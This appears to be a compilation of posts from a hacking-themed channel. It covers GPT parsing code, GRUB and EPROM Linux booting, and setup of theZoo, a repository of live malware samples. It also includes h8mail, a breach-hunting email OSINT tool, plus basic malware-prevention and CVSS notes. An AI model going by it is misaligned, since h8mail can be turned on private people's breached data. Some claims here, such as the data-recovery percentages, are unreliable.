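    return zlib.crc32(data) & 0xFFFFFFFF


def parse_gpt(image: bytes) -> dict:
    """Parse the primary header (LBA 1) and its partition array.

    Raises ValueError on a bad signature or CRC: a freshly converted disk
    must pass exactly these checks before the firmware will trust it.
    """
    hdr = image[SECTOR:SECTOR + struct.calcsize(HDR_FMT)]
    (sig, _rev, hsize, hcrc, _res, _cur, backup, first, last,
     dguid, parts_lba, nparts, esize, pcrc) = struct.unpack(HDR_FMT, hdr)
    if sig != b"EFI PART":
        raise ValueError("no GPT signature at LBA 1")
    # The header CRC covers the first hsize bytes with the CRC field zeroed.
    full = image[SECTOR:SECTOR + hsize]
    if crc32(full[:16] + b"\0\0\0\0" + full[20:]) != hcrc:
        raise ValueError("GPT header CRC mismatch")
    start = parts_lba * SECTOR
    array = image[start:start + nparts * esize]
    if crc32(array) != pcrc:
        raise ValueError("partition array CRC mismatch")
    parts = []
    for i in range(nparts):
        ptype, pguid, pfirst, plast, _attrs, name = struct.unpack(
            ENTRY_FMT, array[i * esize:(i + 1) * esize])
        ptype = uuid.UUID(bytes_le=ptype)      # GPT stores GUIDs mixed-endian
        if ptype.int == 0:                     # unused entry
            continue
        parts.append({
            "number": i + 1, "type": ptype, "guid": uuid.UUID(bytes_le=pguid),
            "first": pfirst, "last": plast,
            "name": name.decode("utf-16-le").rstrip("\0"),
        })
    return {"disk_guid": uuid.UUID(bytes_le=dguid), "backup_lba": backup,
            "first_usable": first, "last_usable": last, "partitions": parts}


def find_esp(gpt: dict):
    """Return the EFI System Partition entry, or None if the disk has none."""
    for p in gpt["partitions"]:
        if p["type"] == ESP_TYPE:
            return p
    return None


def mib(p: dict) -> float:
    """Partition size in MiB, the unit gdisk prints."""
    return (p["last"] - p["first"] + 1) * SECTOR / 2 ** 20


def build_sample_image() -> bytes:
    """Constructed image: blank LBA 0, primary header at LBA 1, 128 entries at
    LBA 2..33. Only the first 34 sectors are materialised; the sector numbers
    are those of the gdisk 'p' output above (ESP is partition 2)."""
    def entry(ptype, first, last, name):
        return struct.pack(ENTRY_FMT, ptype.bytes_le, uuid.uuid4().bytes_le,
                           first, last, 0,
                           name.encode("utf-16-le").ljust(72, b"\0"))
    entries = [entry(BASIC_DATA_TYPE, 421888, 7829503, "Linux/Windows data"),
               entry(ESP_TYPE, 2048, 421887, "EFI System")]
    array = b"".join(entries).ljust(128 * 128, b"\0")
    hdr_no_crc = struct.pack(HDR_FMT, b"EFI PART", 0x00010000, 92, 0, 0,
                             1, 7831551, 34, 7831518, uuid.uuid4().bytes_le,
                             2, 128, 128, crc32(array))
    hdr = hdr_no_crc[:16] + struct.pack("<I", crc32(hdr_no_crc)) + hdr_no_crc[20:]
    return b"\0" * SECTOR + hdr.ljust(SECTOR, b"\0") + array


if __name__ == "__main__":
    gpt = parse_gpt(build_sample_image())
    esp = find_esp(gpt)
    print("ESP is partition %d: sectors %d-%d (%.1f MiB)"
          % (esp["number"], esp["first"], esp["last"], mib(esp)))
```

To check a real disk, read its first 34 sectors as root (the protective MBR, the header and the 128 entries) and pass the bytes to parse_gpt(); a CRC mismatch there means the write did not complete or something else touched the table, and the disk should not be rebooted until gdisk has been run again.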
3) Install GRUB
1 Find your EFI partition and mount it at /boot/efi. Add that mount to /etc/fstab.
2 Install the grub-efi package.
3 Switch your firmware boot priority from "UEFI and Legacy" to "UEFI only" (or a similar option).
You should work out which version of grub-efi to install. Note that the command
ioreg -l -p IODeviceTree | grep firmware-abi
is a macOS command and does not exist on a Linux live system; on Linux the equivalent check is to read /sys/firmware/efi/fw_platform_size, which prints 32 or 64 (the /sys/firmware/efi directory is only present when the system was booted in EFI mode). For 32-bit firmware (EFI32) install the grub-efi-ia32 package; for 64-bit firmware (EFI64) install the grub-efi-amd64 package. You can install the packages with
sudo apt-get install <package name>
This will only work if you have booted in EFI mode.
If it does not work, you could try these step-by-step instructions (under "Install GRUB2 in (U)EFI systems") once grub-efi is installed.
Configuring (+ Dual Boot)
If RAOK's instructions work, you should be able to add the following entry to /etc/grub.d/40_custom to chainload the Windows boot manager:
menuentry "Windows 7" {
set root='(hd0,gpt1)'
chainloader /EFI/microsoft/bootmgfw.efi
}
This assumes that GRUB sees the Windows disk as hd0 and that the EFI System Partition (where bootmgfw.efi lives) is GPT partition 1. Adjust both to match your disk: hd1 if Windows is on the second disk, and gpt2 if the ESP got partition number 2, as it did in the gdisk example above.
Now run
update-grub
to regenerate the GRUB configuration file.
ENJOY
Powered BY wiki
# Tested by Underc0de
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Booting Linux from EPROM Full by UndercOde :
A method for running Linux on an embedded system without a hard disk. The application we introduce is the Operator Interface of a monitoring display system developed by Boeing Flight Test. The flight environment requires a system that survives sudden power loss, so we decided to implement the Operator Interface on a system without a hard disk.
twitter.com/UndercOdeTc
π¦ ππΌππ πππΈβπ :
1) The basic approach: boot from an SSD (solid-state disk) that carries the EPROM, copy the root file system from the EPROM to a RAM disk, then load the Operator Interface software from a client and execute it.
2) The hardware we chose was a
> VME-based single-board computer with 16 MB of RAM, a PC/104 SSD board able to hold 4 MB of EPROM, and some other PC/104 boards. Its BIOS supports booting from the SSD. The system uses a programmable keyboard and a standard VGA display card.
3) Operating system
At boot time there were two options to consider:
* use loadlin under DOS (it can be added to AUTOEXEC.BAT) to boot Linux
* install LILO and boot Linux directly
The benefit of the second option is a slightly shorter boot time. We used the first because we use a programmable keyboard, and the software that programs the keyboard runs under DOS.
4) Some kernel hacking is needed. ramdisk.c was changed to load from any block device, not just from a floppy disk. In addition, we wrote a new block device driver for the EPROM device.
5) The first idea for the EPROM device driver was to put a plain disk image in EPROM. That gives a RAM disk of the same size as the EPROM, in this case 3.5 MB (the DOS partition of the SSD occupies the other 0.5 MB). To get a larger RAM disk we use a compressed disk image. The idea of the compression is simple: each distinct sector is stored once. The advantage is that the blank areas of the disk image do not occupy EPROM space.
6) In order to run the Operator Interface program automatically, we need a program in place of getty.
> This program (dboot.c) runs the login program and sets stdin, stdout and stderr to the specified virtual terminal.
π¦ The boot process is as follows:
* power-on memory test
* DOS loads and executes AUTOEXEC.BAT
* the keyboard application runs
* LOADLIN runs: the Linux kernel is read from the DOS partition
* the Linux kernel takes over
* the EPROM disk is loaded into RAM
* the root file system is switched to the RAM disk
* init reads inittab; note that inittab runs dboot instead of getty
* the Operator Interface starts
Development
The task of the next phase is to organize the contents of the EPROM disk. We use the following auxiliary disks for this task:
* /dev/hda1 - 80 MB Linux system
* /dev/hda2 - 6 MB EPROM image partition
* /dev/hda3 - 20 MB DOS partition
* booting with LILO
Programming the EPROM directly takes time, so most of our development is done on these auxiliary disks.
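Step 5 above describes the compressed EPROM image only in one sentence (each distinct sector is stored once, so blank areas cost nothing). The following is an added example, not part of the original post and not the authors' EPROM driver: it implements that sector-level deduplication with a container format of my own (a 16-byte header, one 32-bit slot index per sector, then the unique sectors) and the loader-side inverse, which is what a RAM-disk loader would run at boot. The sample image is constructed inside build_sample_image() and stands in for the 6 MB eprom.dsk of the real system.

```python
# Added example (not from the original post): sector-level deduplication of a
# disk image, the idea described in step 5. The container format is my own;
# the authors' EPROM driver format is not described in the post and this is
# not it. build_sample_image() constructs the test data.
import random
import struct

SECTOR = 512
MAGIC = b"EPRD"
HEADER = "<4sIII"   # magic, sector size, sector count, unique-sector count


def pack_image(image: bytes, sector: int = SECTOR) -> bytes:
    """Store each distinct sector once; the index maps sector number -> slot."""
    if len(image) % sector:
        raise ValueError("image is not a whole number of sectors")
    count = len(image) // sector
    slots = {}        # sector content -> slot number
    unique = []       # slot number -> sector content
    index = []
    for i in range(count):
        s = image[i * sector:(i + 1) * sector]
        slot = slots.get(s)
        if slot is None:
            slot = len(unique)
            slots[s] = slot
            unique.append(s)
        index.append(slot)
    header = struct.pack(HEADER, MAGIC, sector, count, len(unique))
    return header + struct.pack("<%dI" % count, *index) + b"".join(unique)


def unpack_image(blob: bytes) -> bytes:
    """Rebuild the full image from the packed form (the loader's job at boot).
    Truncated or inconsistent input is rejected rather than silently padded."""
    magic, sector, count, uniq = struct.unpack_from(HEADER, blob, 0)
    if magic != MAGIC:
        raise ValueError("bad magic")
    off = struct.calcsize(HEADER)
    index = struct.unpack_from("<%dI" % count, blob, off)
    off += 4 * count
    store = blob[off:off + uniq * sector]
    if len(store) != uniq * sector:
        raise ValueError("truncated sector store")
    if any(slot >= uniq for slot in index):
        raise ValueError("index points past the sector store")
    return b"".join(store[slot * sector:(slot + 1) * sector] for slot in index)


def unique_sectors(blob: bytes) -> int:
    """Number of distinct sectors kept in a packed image."""
    return struct.unpack_from(HEADER, blob, 0)[3]


def build_sample_image(sectors: int = 4096) -> bytes:
    """Constructed 2 MiB image: all zeros except a 200-sector 'file' at
    sector 10 and an identical copy of it at sector 1000 (a duplicated file).
    Random payload is the worst case for the scheme; the gain comes from the
    blank sectors and the duplicate, exactly as in the post."""
    rng = random.Random(1)
    payload = bytes(rng.getrandbits(8) for _ in range(200 * SECTOR))
    img = bytearray(sectors * SECTOR)
    img[10 * SECTOR:210 * SECTOR] = payload
    img[1000 * SECTOR:1200 * SECTOR] = payload
    return bytes(img)


if __name__ == "__main__":
    img = build_sample_image()
    packed = pack_image(img)
    print("%d sectors -> %d unique, %d bytes packed (%.1f%% of original)" % (
        len(img) // SECTOR, unique_sectors(packed), len(packed),
        100.0 * len(packed) / len(img)))
    assert unpack_image(packed) == img
```

On the sample image the 4096 sectors collapse to 201 unique ones (one all-zero sector plus the 200 distinct payload sectors), so the packed form is under 6% of the original; a real root file system with a few megabytes of free space behaves the same way, which is why a 6 MB image could fit in a 3.5 MB EPROM window.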
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Booting Linux from EPROM Full by UndercOde Part 2 :
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
The development of the disk image starts by determining the requirements: complete a minimal system first, then add the items required by the Operator Interface. Since I am not a Unix expert, completing this minimal system was a trial-and-error process; I kept experimenting until the system ran normally.
1) The next step is to copy the contents of the Linux partition to the 6 MB partition and then, under DOS, run:
loadlin zimage root=/dev/hda2 ro
2) Once the system is stable, load the 6 MB partition into the RAM disk. This is similar to loading from EPROM, so the system can be tested without programming the EPROM. Under DOS:
loadlin zimage root=/dev/hda2 ramdisk=6144 ro
3) Because ramdisk.c was modified, the /dev/hda2 disk image is loaded into RAM and the root partition is switched to the RAM disk. We keep modifying the disk image until it works properly.
4) Programming the EPROMs
First use tar to pack the small disk image, then unpack the archive into a clean file system.
5) To pack the disk image, boot Linux and mount the 6 MB partition. Do not tar the proc file system. We use the following commands:
mount -t ext2 /dev/hda2 /mnt
cd /mnt
tar -cpf /tmp/eprom.tar *
6) To generate the disk image, I used another computer with a 6 MB RAM disk and the following command line:
dd if=/dev/zero of=/dev/ram count=12288
mke2fs /dev/ram 6144
mount -t ext2 /dev/ram /mnt
cd /mnt
tar -xpf ~/eprom.tar
dd if=/dev/ram of=~/eprom.dsk count=12288
7) This produces the eprom.dsk file. We use the med.c program to convert the disk image (eprom.dsk) into the image that will be programmed into the EPROMs:
med ~/eprom.dsk ~/eprom.img
8) The EPROM programmer then burns the EPROM image (eprom.img) into the EPROMs.
9) DOS boot SSD
The SSD feature of the SBC helps us build the DOS disk. The DOS SSD needs at least the following files: the DOS boot files, command.com, autoexec.bat, the keyboard loader, loadlin and zImage.
π¦ Conclusion
The development effort on the auxiliary disks is large, and we need to take steps to reduce the workload. The EPROM disk works very well in our application.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 2020 Password Breach Hunting & Email OSINT tool, locally or using premium services. Supports chasing down related email
pinterest.com/UndercOdeOfficial
πβπππΈπππππΈπππβ & βπβ :
>pip3 install h8mail
manual :
1) git clone https://github.com/khast3x/h8mail
2) cd h8mail
3) python3 setup.py install
4) usage: h8mail [-h] [-t USER_TARGETS [USER_TARGETS ...]]
[-u USER_URLS [USER_URLS ...]] [-q USER_QUERY] [--loose]
[-c CONFIG_FILE [CONFIG_FILE ...]] [-o OUTPUT_FILE]
[-bc BC_PATH] [-sk] [-k CLI_APIKEYS [CLI_APIKEYS ...]]
[-lb LOCAL_BREACH_SRC [LOCAL_BREACH_SRC ...]]
[-gz LOCAL_GZIP_SRC [LOCAL_GZIP_SRC ...]] [-sf]
[-ch [CHASE_LIMIT]] [--power-chase] [--hide] [--debug]
[--gen-config]
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Home Of Malwares 2020
>theZoo is a project created to make malware analysis open and available to the public: a repository of live malware samples and leaked malware source code.
pinterest.com/UndercOdeOfficial
π¦ πβπππΈπππππΈπππβ & βπβ :
1) Clone the repository with git clone https://www.github.com/ytisf/theZoo, change into the directory and run pip install --user -r requirements.txt. That installs all the latest requirements needed. In total it can be "scripted" like so:
git clone https://www.github.com/ytisf/theZoo
2) cd theZoo
3) pip install --user -r requirements.txt
4) Start by running the console:
python theZoo.py
5) You can call the program with the same command-line arguments as before. The current default state of the theZoo runtime is the CLI. The following files and directories are responsible for the application's behaviour:
/conf - holds files relevant to a particular run of the program that are not part of the application itself; the EULA file lives here, among others.
/imports - contains the .py import files used by the rest of the application.
/malware/Binaries - the actual malware samples - be careful! These are very live. Only handle them inside an isolated, snapshotted VM with no network access.
/malware/Source - malware source code.
> Malware under the Original folder is supposed to be (NO PROMISES!) the original source of the malware that leaked.
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Virus-malwares types
twitter.com/UndercOdetc
1) File viruses. These attach their own code to executable files (EXE, COM, BAT, ...). A typical representative is "Black Friday" (the Jerusalem virus).
2) Boot sector viruses. This type writes its code into the boot sector, master boot record or partition table of a hard disk. Typical representatives are the Stoned ("marijuana") virus, Disk Killer, and so on.
3) Multipartite viruses. A hybrid of the first two types; they spread quickly over networks through executable files.
4) Macro viruses. In August 1995 Windows 95 was released and quickly became the mainstream operating system. The various viruses that had lived under DOS gradually lost their vitality because they were not adapted to the new system. Two new kinds of virus took their place: one still attacks executable files, such as the notorious CIH virus; the other is the macro virus, which infects the macros defined by widely used word processing software (such as Word) and therefore spreads rapidly. Melissa is the "outstanding" representative of this kind.
5) Network viruses. These spread through websites and e-mail, hidden in Java and ActiveX programs. If a user downloads a program carrying the virus, it immediately begins its destructive activity. Because of the rapid spread of the Internet, this type of virus is even more harmful; it has been rampant recently, and the destructive "Love" virus (ILOVEYOU) belongs to this category.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Judging whether a machine is infected (signs of infection)
1) Security tools will not run
2) Online anti-virus web pages and files cannot be opened
3) Crashes with "insufficient memory" errors
4) Task Manager or the startup items look abnormal
5) Hard disk and network card activity lights flash wildly
6) Abnormal QQ, MSN or online game logins
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Malware control :
>Because viruses can seriously damage computer resources, effective measures must be taken on both the management and the technical side to prevent virus intrusion.
T.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
In daily work, the main measures to prevent virus infection are:
1) First and most important: choose and install anti-virus software. New viruses appear continuously (on average 13 a day), and in today's highly shared, highly networked world a computer without anti-virus software can hardly avoid virus attacks. Regularly check the machines in use, including the removable media and hard disks they use, so that viruses are detected in time and dealt with before they do harm.
2) Reduce users' write permission on the server. Keeping write access to the server in the hands of as few people as possible avoids unnecessary trouble and loss.
3) Beware of floppy disks, USB sticks and pirated optical discs of unknown origin. Think carefully before you put such media into a drive. If you must, first check the disk with anti-virus software and scan every file on it (not only executable files), including compressed files. Likewise, when you lend a disk to someone, write-protect it first so that viruses on their machine cannot be written to your disk.
4) Scan e-mail before reading it. Some mail clients automatically open attachments when the user opens a message; turn that feature off.
5) Be careful when downloading; downloaded files are one source of viruses.
Save shared documents in RTF or plain text (ASCII) format. If you want to share data with others on a network server without worrying about macro viruses, save the file as RTF or plain text, because neither format carries Office macros.
6) Lay out hard disk partitions sensibly and keep a recovery path. Generally the C drive should use FAT32 and be larger than 20 GB; with that layout, if the C drive is damaged by a virus, more than 98% of the data can be recovered with KV300, whereas with FAT16 and a C drive under 20 GB only about 5% can.
Use Ghost (cloning) software to back up the hard disk so the system can be restored quickly,
or use the Windows system's own restore settings.
7) Upgrade anti-virus software promptly to keep defences current.
8) Important data and files must be backed up, offline or in the cloud.
9) Check firewalls.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ CVSS Scores & Vulnerability Types (Windows Server 2019 example) :
> The Common Vulnerability Scoring System (CVSS) is a free and open industry standard for assessing the severity of computer system security vulnerabilities. CVSS assigns severity scores to vulnerabilities so that responders can prioritize responses and resources according to threat.
π¦ ππΌππ πππΈβπ :
CVSS Score: 2.1 (a CVSS v2 base score: the "Partial" impact level and the "Authentication" metric below exist only in v2)
Confidentiality Impact: Partial (there is considerable informational disclosure)
Integrity Impact: None (there is no impact to the integrity of the system)
Availability Impact: None (there is no impact to the availability of the system)
Access Complexity: Low (specialized access conditions or extenuating circumstances do not exist; very little knowledge or skill is required to exploit)
Authentication: Not required (authentication is not required to exploit the vulnerability)
Gained Access: None
Vulnerability Type(s): Bypass a restriction or similar
CWE ID: 20 (Improper Input Validation)
π¦ Effects :
1) The Common Vulnerability Scoring System (CVSS) provides a way to capture the principal characteristics of a vulnerability and produce a numerical score reflecting its severity.
2) The numerical score can then be translated into a qualitative rating (low, medium and high for v2; v3 adds none and critical) to help organizations assess and prioritize their vulnerability management processes.
3) CVSS is a published standard used by organizations worldwide, and the mission of the CVSS Special Interest Group (SIG) at FIRST is to continue to improve it.
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β